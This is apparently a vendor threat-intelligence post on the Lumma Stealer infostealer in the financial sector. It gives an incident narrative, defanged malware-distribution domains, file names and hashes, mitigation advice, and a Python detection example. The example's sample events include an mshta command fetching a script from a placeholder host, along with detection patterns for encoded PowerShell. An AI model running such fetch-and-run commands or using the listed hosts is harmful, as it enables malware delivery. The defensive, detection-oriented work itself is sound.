August 23, 2024
By PRL

Lumma Stealer: The Silent Predator Targeting Financial Institution

The information-stealer ecosystem continues to expand, with ongoing maintenance and new capabilities appearing in the latest stealer versions. Recently, we found a significant increase in Lumma Stealer activity in our clients' environments, carrying out its stealthy and dangerous moves particularly within the financial sector. This malware is not just another run-of-the-mill threat: it is a sophisticated tool designed to exfiltrate sensitive data with alarming efficiency. As Lumma Stealer continues to evolve, financial institutions are becoming prime targets, and the need for heightened security measures has never been more critical.

The Mission: Lumma Stealer is engineered to steal. It targets login credentials, bank details, and cryptocurrency wallet information, turning compromised devices into goldmines for cybercriminals.

Why Financial Institutions Are in the Crosshairs

The financial sector is a treasure trove for attackers, and Lumma Stealer is laser-focused on exploiting it. Recent reports reveal a staggering surge in cyberattacks, over 420,000 in just a few months, many of which are linked to Lumma Stealer. The malware's ability to bypass defenses and zero in on cryptocurrency wallets and two-factor authentication (2FA) systems is particularly concerning, putting both transactions and customer data at severe risk.

Lumma Stealer in Action

Recently, a financial institution faced a significant challenge. The threat began subtly, initiated by a seemingly harmless PowerShell process. Beneath the surface, however, encoded commands were being carried out, executing unauthorized and suspicious actions that pointed to obfuscation and malicious intent. We also noticed abnormal usage of mshta.exe, a legitimate Windows tool that had been abused to run external scripts from a suspicious URL, a classic method for delivering malware. An unusual process involving Ashampoo.exe and BitLockerToGo.exe was also identified, indicating unauthorized activity. Fortunately, our security tooling detected and neutralized these threats. Instances of unsigned executables running from temporary directories were also flagged as potential malware activity, prompting swift action. Despite the challenges, our vigilant approach and effective security measures successfully ensured the institution's safety.
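The three behaviours described above (an encoded PowerShell command, mshta.exe fetching a script from a URL, and an unsigned executable launched from a temp directory) can be expressed as simple process-creation checks. The following is an added example, not the original post's or PRL's own tooling; the event fields, the user path and the URL are constructed assumptions.

```python
import base64
import re

# Constructed sample process-creation events (not from the original post).
# Each mirrors one behaviour described in the incident narrative above.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + base64.b64encode("Start-Process notepad".encode("utf-16le")).decode(),
     "signed": True},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/payload.hta",  # placeholder URL
     "signed": True},
    {"image": r"C:\Users\alice\AppData\Local\Temp\outlook-attachment.exe",
     "cmdline": "outlook-attachment.exe", "signed": False},
    {"image": r"C:\Program Files\Tool\tool.exe", "cmdline": "tool.exe --update",
     "signed": True},  # benign control event, should produce no alert
]

# -EncodedCommand and its short forms; PowerShell expects base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"(?i)\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")
URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://\S+")
TEMP_DIRS = ("\\temp\\", "\\tmp\\", "\\appdata\\local\\temp\\")


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return the list of alert tags triggered by one process-creation event."""
    image = event["image"].lower()
    cmd = event["cmdline"]
    tags = []
    if image.endswith("powershell.exe") and decode_encoded_powershell(cmd) is not None:
        tags.append("encoded-powershell")
    if image.endswith("mshta.exe") and URL_RE.search(cmd):
        tags.append("mshta-remote-script")
    if not event["signed"] and any(d in image for d in TEMP_DIRS):
        tags.append("unsigned-temp-executable")
    return tags


def scan(events):
    """Map each flagged image path to its alert tags; clean events are dropped."""
    return {e["image"]: classify(e) for e in events if classify(e)}
```

Decoding the payload lets an analyst review what the encoded command actually does before acting on the alert.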

Indicators of Compromise (IOCs) to look out for

Domains from our research associated with Lumma Stealer

·      https://keto21[.]b-cdn[.]net/town-fil

·      https://microsoftcamp-v1[.]b-cdn[.]net/micro-v1

·      apzzz-20c7e[.]kxcdn[.]com

Files found to be associated with Lumma Stealer

·      outlook-attachment.exe

·      town-fil

·      micro-v1

·      K[1].zip

·      K[2].zip

·      outlook

·      ashampoo.exe

·      BitLockerToGo.exe

File Hashes

·      0581756a656ace2e7d164b1f66846e9d079755bd7a5cead72e73b53ab534531b (micro-v1)

·      5f4cf4082dbd503c6f0b652ddd22675f4427a907726e2f8d08c718adeafbb568 (town-fil)

** Note: these two hashes belong to two different files from different environments, yet both pointed to the same file, "BthUdTask.exe."

Limitations

·      Encrypted PowerShell scripts that required a decryptor key

The Fallout: What's at Stake

If Lumma Stealer gains a foothold, the consequences can be dire:

·      Data Theft: Critical information such as passwords, credit card numbers, and cookies can be stolen and sold on the dark web.

·      Financial Loss: Especially for those in the cryptocurrency space, Lumma Stealer can drain wallets and leave users with significant economic losses.

·      Reputational Damage: A breach could tarnish your institution's reputation, leading to lost trust and potential financial instability.

·      Identity Theft: Stolen personal information can lead to identity theft, compounding the damage.


Fighting Back: How to Protect Your Institution

With Lumma Stealer on the rise, here's how to safeguard your financial institution:

·       Implement threat intelligence to proactively counter the threats associated with Lumma Stealer.

·       Protect endpoints with robust endpoint security solutions that provide real-time monitoring and threat detection.

·       Configure firewalls to block outbound communication to known malicious IP addresses and domains associated with Lumma Stealer command and control servers.

·       Employ application whitelisting to allow only approved applications to run on endpoints, preventing the execution of unauthorized or malicious executables.

·       Equip your team with the knowledge to spot phishing attempts and avoid risky online behavior.

·       Have an incident response plan and practice it regularly to ensure a swift, effective response to any security incident.

·       Multi-Factor Authentication: Add layers of security to your transactions with multi-factor authentication, making it harder for attackers to gain access.


The Bottom Line

Lumma Stealer is a clear and present danger to financial institutions. As this malware continues to evolve, so must your defenses. Subscribe to threat intelligence to stay vigilant and stay informed about this rising threat.